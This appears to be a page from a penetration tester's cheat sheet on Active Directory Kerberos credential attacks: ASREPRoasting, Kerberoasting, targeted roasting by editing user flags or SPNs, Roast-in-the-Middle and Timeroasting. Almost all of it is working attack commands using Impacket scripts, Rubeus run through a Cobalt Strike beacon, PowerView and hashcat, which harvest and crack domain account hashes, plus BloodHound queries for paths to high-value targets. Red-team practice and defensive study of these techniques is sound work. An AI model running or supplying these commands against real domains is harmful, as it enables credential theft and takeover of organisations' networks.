ASREPRoasting
Show domain users with DONT_REQ_PREAUTH flag set:
Copy PowerView3 > Get-DomainUser -UACFilter DONT_REQ_PREAUTH Normal
GetNPUsers.py
Copy $ GetNPUsers.py megacorp.local/ -dc-ip 127.0.0.1 -no-pass -usersfile ~/ws/enum/names.txt -request -outputfile asrep.in | tee GetNPUsers.out
$ cat GetNPUsers.out | grep -v 'Client not found in Kerberos database'
$ hashcat -m 18200 -O -a 0 -w 3 --session=asrep -o asrep.out asrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule ASREPRoast.ps1
Copy PS > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash Rubeus
Copy beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
beacon> execute-assembly Rubeus.exe asreproast /nowrap [/user:svc_mssql] Targeted
Copy PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
ASREPRoast > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue Kerberoasting
Check msDS-SupportedEncryptionTypes attribute (if RC4 is enabled):
Copy PowerView3 > Get-DomainUser -Identity snovvcrash -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes Normal
GetUserSPNs.py
Copy $ GetUserSPNs.py megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 127.0.0.1 -request -outputfile tgsrep.in
$ hashcat -m 13100 -O -a 0 -w 3 --session=tgsrep -o tgsrep.out tgsrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
Copy $ cat ~/ws/enum/tgsrep.in | grep -Pho 'krb5tgs\$23\$.*?\$' | cut -d'*' -f2 | cut -d'$' -f1 > t
$ for acc in `cat t`; do grep -ai $acc ~/ws/loot/ntds.cracked | cut -d: -f1 >> t2; done && rm t
$ vi t2
...convert domain prefix to domain suffix (megacorp.local\svcsql -> svcsql@megacorp.local)...
$ python3 max.py -u neo4j -p 'WeaponizeK4li!' mark-owned -f t2 --add-note "kerberoasted" && rm t2
$ python3 max.py -u neo4j -p 'WeaponizeK4li!' query -q 'MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p' --path PowerView
Copy PowerView3 > Invoke-Kerberoast -OutputFormat Hashcat | fl Rubeus
Copy beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(servicePrincipalName=*))"
beacon> execute-assembly Rubeus.exe kerberoast /format:hashcat /nowrap [/usetgtdeleg] [/user:svc_mssql] Targeted
Copy PowerView3 > Get-DomainUser snovvcrash | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
PowerView3 > $User = Get-DomainUser snovvcrash
PowerView3 > $User | Get-DomainSPNTicket | fl
PowerView3 > $User | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -Clear serviceprincipalname Roast-in-the-Middle
Copy $ sudo ritm -t/--target 192.168.1.123 -g/--gateway 192.168.1.1 -d/--dc-ip 192.168.1.11 -u/--users-file users.txt Downgrading Encryption Type (RC4)
Timeroasting
Copy $ python3 timeroast.py -a 50 -t 120 -o sntp.in 192.168.1.11
$ hashcat -m31300 -O -a0 -w3 --session=sntp -o sntp.out sntp.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
$ hashcat -m10 -O -a0 -w3 --session=sntp -o sntp.out sntp.in nthashes.txt --hex-wordlist --hex-salt Targeted
